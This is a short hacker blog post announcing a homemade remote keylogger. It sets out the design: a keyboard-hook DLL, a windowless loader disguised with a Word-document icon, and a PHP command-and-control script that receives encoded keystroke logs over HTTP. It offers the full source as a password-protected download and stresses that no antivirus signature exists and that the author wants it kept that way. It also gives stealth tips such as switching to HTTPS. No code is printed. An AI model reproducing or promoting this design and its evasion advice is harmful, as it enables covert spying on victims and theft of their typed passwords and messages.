Salutations fellow hackers and crackers alike!
Over the past few months I’ve been off and on writing a remote key logger. Why? Just to keep sharp I guess. How can we hope to stay on top of malware trends if we don’t attempt to think like the enemy? The fine line between white hat and black hat.
The following was done in 3 parts.
1) The static key logger initialization app. A plain old windowless application – not a console app since windows apps are smaller for some reason that invokes a dll. The program has a 5 minute timer (changeable in the source) that takes the logged keystroke files and converts them into an encrypted format and sends them off to our CNC script.
2) The keyboard hook dll. The file responsible for logging the keystrokes of other programs and for storing the info in a file for later use.
3) The CNC script. A small PHP script I wrote placed on a web server that does a basic User Agent string check before processing POST requests containing encrypted data. I think I used Chrome 23, though in hindsight, I should have used a special cookie or something.
The whole thing was made in C and PHP, has a word document icon, and when compiled, is less than 85KB in size (including DLL). No packing done, so it could technically go smaller.
Internally, I am utilizing a form of off-beat encoding to send the data. It looks like XOR, but it’s not. It’s base64 with an alternate library like unicode and such. Communication is done with HTTP requests, though if you want to remain stealthy longer, use an HTTPS server instead. This is changed in the defines section:
You can download the entire collection of code here. The password is ‘lolwut’.
Joes Remote Key Logger
One final note, I compiled this with Pelles C compiler, although I’m certain you could get this to work with little effort in Visual Studio or with MingW / CodeBlocks / DevC++
Presently there is no malware signature for these files and I’d like to keep it this way. Then again, why would there be a signature? I just wrote the thing! Please use this responsibly.